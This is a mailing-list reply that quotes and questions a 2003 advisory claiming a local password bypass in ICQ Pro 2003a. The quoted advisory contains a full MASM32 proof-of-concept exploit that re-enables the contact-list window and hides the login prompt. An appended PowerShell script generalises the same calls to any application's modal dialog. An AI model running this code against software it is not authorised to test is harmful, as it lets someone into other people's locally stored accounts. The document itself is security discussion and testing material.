Message of Cauê Moura Prado at Jul 5 13:30 ...

CMP> Software: ICQ 2003a
CMP> Threat: Login password can be bypassed locally

Maybe I missed something, but does it mean that ICQ 2003a and the other versions mentioned cache the registered user's password regardless of the user's intention, or do you guys just run your "exploit" right after a valid user's session, so that the status might be changed back to online just before the connection timeout expires? I suppose the latter. As a matter of fact, it can still be considered an exploit, but the timing limitations must be documented properly. It's hard to believe you can start an ICQ session without having the UIN's password, because the server will just refuse to authorize that. And, I'm afraid to ask, you notified the vendors before releasing the thing, didn't you?

CMP> I have found a vulnerability in ICQ Pro 2003a that
CMP> allows anyone to connect to the ICQ server using any
CMP> account registered locally, regardless of whether the 'save
CMP> password' option is checked or not. The high level
CMP> security password is also bypassed!
CMP>
CMP> How does it work?
CMP> Simple! You may use the EnableWindow API to enable the ICQ
CMP> contact list window. After enabling the window you can
CMP> set your status to online and the UIN will be
CMP> connected no matter how high your security level is.
CMP>
CMP> I coded a proof-of-concept exploit on July 02, when
CMP> I found the vuln.
CMP> The exploit is provided "as is" without warranties.
CMP> To compile it you will need MASM32.
CMP>
CMP> ; =========================================================================
CMP> ; CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
CMP> ; -------------------------------------------------------------------------
CMP> ;
CMP> ; 07/02/2003 - ca1-icq.asm
CMP> ; ICQ Password Bypass exploit.
CMP> ; written by Cauê Moura Prado (aka ca1)
CMP> ; mouraprado@infoguerra.com.br - ICQ 373313
CMP> ;
CMP> ; This exploit allows you to login to the ICQ server using any account registered *locally*
CMP> ; no matter whether the 'save password' option is checked or not. High level security is also bypassed.
CMP> ; All you have to do is run the exploit and set the status property using your mouse when the flower
CMP> ; is yellow. If you accidentally set the status to offline then you will need to restart ICQ and run
CMP> ; the exploit again. Greets to: Alex Demchenko (aka Coban), my cousin Rhenan for testing the exploit
CMP> ; on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
CMP> ; I can't forget... many kisses to those 3 chicks from my building for being so hot!! ;)
CMP> ;
CMP> ;
CMP> ;            uh-oh!
CMP> ;              ___
CMP> ;           __/   \__
CMP> ;          /  \___/  \         Vulnerable:
CMP> ;          \__/+ +\__/         ICQ Pro 2003a Build #3800
CMP> ;          /   ~~~   \
CMP> ;          \__/   \__/         Not Vulnerable:
CMP> ;             \___/            ICQ Lite alpha Build 1211
CMP> ;                              ICQ 2001b and ICQ 2002a
CMP> ;         tHe Flaw Power       All other versions were not tested.
CMP> ;
CMP> ; coded with masm32
CMP> ;
CMP> ; _______________________________________________________________________________exploit born in .br
CMP>
CMP> .386
CMP> .model flat, stdcall
CMP> option casemap:none
CMP>
CMP> include \masm32\include\user32.inc
CMP> include \masm32\include\kernel32.inc
CMP> includelib \masm32\lib\user32.lib
CMP> includelib \masm32\lib\kernel32.lib
CMP>
CMP> .data
CMP> szTextHigh   byte 'Password Verification', 0   ; title of the high-security login dialog
CMP> szTextLow    byte 'Login to server', 0         ; title of the normal login dialog
CMP> szClassName  byte '#32770', 0                  ; standard Windows dialog box class
CMP>
CMP> .data?
CMP> hWndLogin    dword ?
CMP>
CMP> .code
CMP> _entrypoint:
CMP>     ; look for the high-security prompt first, then for the plain login prompt
CMP>     invoke FindWindow, addr szClassName, addr szTextHigh
CMP>     mov hWndLogin, eax
CMP>     .if hWndLogin == 0
CMP>         invoke FindWindow, addr szClassName, addr szTextLow
CMP>         mov hWndLogin, eax
CMP>     .endif
CMP>     .if hWndLogin != 0
CMP>         ; the login dialog is modal: its owner (the contact list) is disabled while it is up
CMP>         invoke GetParent, hWndLogin
CMP>         invoke EnableWindow, eax, 1           ; enable the ICQ contact list window
CMP>         invoke ShowWindow, hWndLogin, 0       ; SW_HIDE: get rid of the login screen (don't kill this window)
CMP>     .endif
CMP>     invoke ExitProcess, 0                     ; uhuu.. cya! i gotta sleep!
CMP> end _entrypoint
CMP>
CMP> ; =========================================================================
CMP> ; CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
CMP> ; -------------------------------------------------------------------------

SY, Seva Gluschenko, just stranger on The Road.
Demos-Internet NOC | GVS-RIPE | GVS3-RIPN
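The condition the quoted exploit relies on is that a modal login dialog (class '#32770') has disabled its owner window, and nothing else stops a second process on the same desktop from calling EnableWindow on that owner. The PowerShell below is an added example, written for this page and not taken from either post or from ICQ: it enumerates the visible dialog-class windows on the desktop, reports whether the owner behind each one is currently disabled, and with -ReEnable repeats the exploit's two calls (enable the owner, hide the prompt) so the behaviour can be checked against any application, not only ICQ. It assumes Windows PowerShell with Add-Type available; the dialog title passed in is an assumption about the application under test. It can show whether an application uses a disabled owner window as its only gate; it says nothing about whether credentials are cached, which is the question raised in the reply.

```powershell
# Added example, not code from the original post or from ICQ. Assumes Windows
# PowerShell (Add-Type); any dialog title you pass is an assumption about the
# application you are testing.
$win32 = @'
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class Win32 {
    public delegate bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam);
    [DllImport("user32.dll")] public static extern bool EnumWindows(EnumWindowsProc cb, IntPtr lParam);
    [DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetClassName(IntPtr hWnd, StringBuilder buf, int max);
    [DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetWindowText(IntPtr hWnd, StringBuilder buf, int max);
    [DllImport("user32.dll")] public static extern IntPtr GetWindow(IntPtr hWnd, uint cmd);
    [DllImport("user32.dll")] public static extern IntPtr GetParent(IntPtr hWnd);
    [DllImport("user32.dll")] public static extern bool IsWindowEnabled(IntPtr hWnd);
    [DllImport("user32.dll")] public static extern bool IsWindowVisible(IntPtr hWnd);
    [DllImport("user32.dll")] public static extern bool EnableWindow(IntPtr hWnd, bool enable);
    [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int cmdShow);
    [DllImport("user32.dll")] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint pid);
}
'@
if (-not ('Win32' -as [type])) { Add-Type -TypeDefinition $win32 }

function Get-ModalDialogGate {
    <#
      Lists visible dialog-class (#32770) windows together with the enabled state of
      their owner window. An owner that is disabled while the dialog is up means the
      application is relying on the modal dialog to keep the user out of the main
      window. -Title restricts the search to one dialog title. -ReEnable applies the
      same two calls the ca1 exploit makes (enable the owner, hide the dialog); only
      run that against software you are authorised to test.
    #>
    param(
        [string]$Title,
        [switch]$ReEnable
    )
    $GW_OWNER = 4
    $SW_HIDE  = 0
    $found = New-Object System.Collections.Generic.List[object]

    $body = {
        param([IntPtr]$hWnd, [IntPtr]$lParam)
        $cls = New-Object System.Text.StringBuilder 64
        [void][Win32]::GetClassName($hWnd, $cls, $cls.Capacity)
        if ($cls.ToString() -ne '#32770' -or -not [Win32]::IsWindowVisible($hWnd)) { return $true }

        $txt = New-Object System.Text.StringBuilder 256
        [void][Win32]::GetWindowText($hWnd, $txt, $txt.Capacity)
        if ($Title -and $txt.ToString() -ne $Title) { return $true }

        # GetParent on a top-level dialog returns its owner (what the exploit uses);
        # GW_OWNER is the explicit form, GetParent is kept as the fallback.
        $owner = [Win32]::GetWindow($hWnd, $GW_OWNER)
        if ($owner -eq [IntPtr]::Zero) { $owner = [Win32]::GetParent($hWnd) }
        if ($owner -eq [IntPtr]::Zero) { return $true }

        [uint32]$ownerPid = 0
        [void][Win32]::GetWindowThreadProcessId($owner, [ref]$ownerPid)
        $ownerTxt = New-Object System.Text.StringBuilder 256
        [void][Win32]::GetWindowText($owner, $ownerTxt, $ownerTxt.Capacity)

        $found.Add([pscustomobject]@{
            Dialog       = $txt.ToString()
            DialogHandle = $hWnd
            Owner        = $ownerTxt.ToString()
            OwnerHandle  = $owner
            OwnerEnabled = [Win32]::IsWindowEnabled($owner)
            Pid          = $ownerPid
        })
        return $true
    }.GetNewClosure()
    $callback = [Win32+EnumWindowsProc]$body

    [void][Win32]::EnumWindows($callback, [IntPtr]::Zero)

    foreach ($gate in $found) {
        if ($ReEnable -and -not $gate.OwnerEnabled) {
            [void][Win32]::EnableWindow($gate.OwnerHandle, $true)    # lift the modal lock on the owner
            [void][Win32]::ShowWindow($gate.DialogHandle, $SW_HIDE)  # hide, do not destroy, the prompt
            $gate.OwnerEnabled = [Win32]::IsWindowEnabled($gate.OwnerHandle)
        }
        $gate
    }
}

# Usage: survey every modal prompt on the desktop, then target one by title.
Get-ModalDialogGate | Format-Table Pid, Owner, Dialog, OwnerEnabled
Get-ModalDialogGate -Title 'Password Verification' -ReEnable
```

A row with OwnerEnabled set to False is the state the exploit needs; if the owner stays disabled after -ReEnable, or the application re-disables it and re-shows the prompt, the dialog is not the only gate. Whether a connection then succeeds without the password, and for how long after a previous session, is exactly the timing question raised in the reply and has to be observed separately against the server.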